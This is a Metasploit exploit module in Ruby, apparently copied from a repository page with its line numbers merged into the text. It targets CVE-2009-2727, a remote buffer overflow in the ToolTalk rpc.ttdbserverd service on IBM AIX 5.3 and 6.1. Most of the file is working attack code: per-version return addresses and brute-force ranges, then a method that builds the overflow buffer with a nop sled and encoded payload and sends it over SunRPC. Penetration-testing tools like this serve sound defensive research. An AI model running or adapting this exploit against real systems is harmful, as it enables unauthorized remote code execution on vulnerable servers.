Path: blob/master/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
21596 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::SunRPC9include Msf::Exploit::Brute1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',16'Description' => %q{17This module exploits a buffer overflow vulnerability in _tt_internal_realpath18function of the ToolTalk database server (rpc.ttdbserverd).19},20'Author' => [21'Ramon de C Valle',22'Adriano Lima <adriano[at]risesecurity.org>',23],24'Platform' => [ 'aix' ],25'References' => [26[ 'CVE', '2009-2727'],27[ 'OSVDB', '55151' ]28],29'Payload' => {30'BadChars' => "\x00"31},32'Targets' => [33[34'IBM AIX Version 6.1.4',35{36'Arch' => 'ppc',37'Platform' => 'aix',38'Ret' => 0x20099430 + 4096,39'Addr1' => 0x2ff1ff50 - 8192,40'AIX' => '6.1.4',41'Bruteforce' =>42{43'Start' => { 'Ret' => 0x20099430 - 8192 },44'Stop' => { 'Ret' => 0x20099430 + 8192 },45'Step' => 102446}47}48],49[50'IBM AIX Version 6.1.3',51{52'Arch' => 'ppc',53'Platform' => 'aix',54'Ret' => 0x20099280 + 4096,55'Addr1' => 0x2ff1ffd0 - 8192,56'AIX' => '6.1.3',57'Bruteforce' =>58{59'Start' => { 'Ret' => 0x20099280 - 8192 },60'Stop' => { 'Ret' => 0x20099280 + 8192 },61'Step' => 102462}63}64],65[66'IBM AIX Version 6.1.2',67{68'Arch' => 'ppc',69'Platform' => 'aix',70'Ret' => 0x20099280 + 4096,71'Addr1' => 0x2ff1ffd0 - 8192,72'AIX' => '6.1.2',73'Bruteforce' =>74{75'Start' => { 'Ret' => 0x20099280 - 8192 },76'Stop' => { 'Ret' => 0x20099280 + 8192 },77'Step' => 102478}79}80],81[82'IBM AIX Version 6.1.1',83{84'Arch' => 'ppc',85'Platform' => 'aix',86'Ret' => 0x20099280 + 4096,87'Addr1' => 0x2ff1ffd0 - 8192,88'AIX' => '6.1.1',89'Bruteforce' =>90{91'Start' => { 'Ret' => 0x20099280 - 8192 },92'Stop' => { 'Ret' => 0x20099280 + 8192 },93'Step' => 102494}95}96],97[98'IBM AIX Version 6.1.0',99{100'Arch' => 'ppc',101'Platform' => 'aix',102'Ret' => 0x20099280 + 4096,103'Addr1' => 0x2ff1ffd0 - 8192,104'AIX' => '6.1.0',105'Bruteforce' =>106{107'Start' => { 'Ret' => 0x20099280 - 8192 },108'Stop' => { 'Ret' => 0x20099280 + 8192 },109'Step' => 1024110}111}112],113[114'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',115{116'Arch' => 'ppc',117'Platform' => 'aix',118'Ret' => 0x20096ba0 + 4096,119'Addr1' => 0x2ff1ff14 - 8192,120'AIX' => '5.3.9',121'Bruteforce' =>122{123'Start' => { 'Ret' => 0x20096ba0 - 8192 },124'Stop' => { 'Ret' => 0x20096ba0 + 8192 },125'Step' => 1024126}127}128],129[130'IBM AIX Version 5.3.10',131{132'Arch' => 'ppc',133'Platform' => 'aix',134'Ret' => 0x20096bf0 + 4096,135'Addr1' => 0x2ff1ff14 - 8192,136'AIX' => '5.3.10',137'Bruteforce' =>138{139'Start' => { 'Ret' => 0x20096bf0 - 8192 },140'Stop' => { 'Ret' => 0x20096bf0 + 8192 },141'Step' => 1024142}143}144],145[146'IBM AIX Version 5.3.9',147{148'Arch' => 'ppc',149'Platform' => 'aix',150'Ret' => 0x20096ba0 + 4096,151'Addr1' => 0x2ff1ff14 - 8192,152'AIX' => '5.3.9',153'Bruteforce' =>154{155'Start' => { 'Ret' => 0x20096ba0 - 8192 },156'Stop' => { 'Ret' => 0x20096ba0 + 8192 },157'Step' => 1024158}159}160],161[162'IBM AIX Version 5.3.8',163{164'Arch' => 'ppc',165'Platform' => 'aix',166'Ret' => 0x20096c10 + 4096,167'Addr1' => 0x2ff1ff98 - 8192,168'AIX' => '5.3.8',169'Bruteforce' =>170{171'Start' => { 'Ret' => 0x20096c10 - 8192 },172'Stop' => { 'Ret' => 0x20096c10 + 8192 },173'Step' => 1024174}175}176],177[178'IBM AIX Version 5.3.7',179{180'Arch' => 'ppc',181'Platform' => 'aix',182'Ret' => 0x20096c10 + 4096,183'Addr1' => 0x2ff1ff98 - 8192,184'AIX' => '5.3.7',185'Bruteforce' =>186{187'Start' => { 'Ret' => 0x20096c10 - 8192 },188'Stop' => { 'Ret' => 0x20096c10 + 8192 },189'Step' => 1024190}191}192],193[194'Debug IBM AIX Version 6.1',195{196'Arch' => 'ppc',197'Platform' => 'aix',198'Ret' => 0xaabbccdd,199'Addr1' => 0xddccbbaa,200'AIX' => '6.1.4',201'Bruteforce' =>202{203'Start' => { 'Ret' => 0xaabbccdd },204'Stop' => { 'Ret' => 0xaabbccdd },205'Step' => 1024206}207}208],209[210'Debug IBM AIX Version 5.3',211{212'Arch' => 'ppc',213'Platform' => 'aix',214'Ret' => 0xaabbccdd,215'Addr1' => 0xddccbbaa,216'AIX' => '5.3.10',217'Bruteforce' =>218{219'Start' => { 'Ret' => 0xaabbccdd },220'Stop' => { 'Ret' => 0xaabbccdd },221'Step' => 1024222}223}224],225],226'DefaultTarget' => 0,227'DisclosureDate' => '2009-06-17',228'Notes' => {229'Reliability' => [ REPEATABLE_SESSION ],230'Stability' => [ CRASH_SERVICE_RESTARTS ],231'SideEffects' => [ IOC_IN_LOGS ]232}233)234)235end236237def brute_exploit(brute_target)238if !@aixpayload239datastore['AIX'] = target['AIX']240@aixpayload = regenerate_payload.encoded241end242243print_status('Trying to exploit rpc.ttdbserverd with address 0x%08x...' % brute_target['Ret'])244245begin246sunrpc_create('tcp', 100083, 1)247248if target['AIX'] =~ /6\./249buf = 'A'250else251buf = 'AA'252end253254buf << [target['Addr1']].pack('N') * (1022 + 8)255buf << [brute_target['Ret']].pack('N') * 32256257if target['AIX'] =~ /6\./258buf << 'AAA'259else260buf << 'AA'261end262263buf << "\x7f\xff\xfb\x78" * 1920264buf << @aixpayload265buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)266267print_status('Sending procedure 15 call message...')268sunrpc_call(15, buf)269270sunrpc_destroy271handler272rescue Rex::Proto::SunRPC::RPCTimeout273# print_error('RPCTimeout')274rescue EOFError275# print_error('EOFError')276end277end278end279280281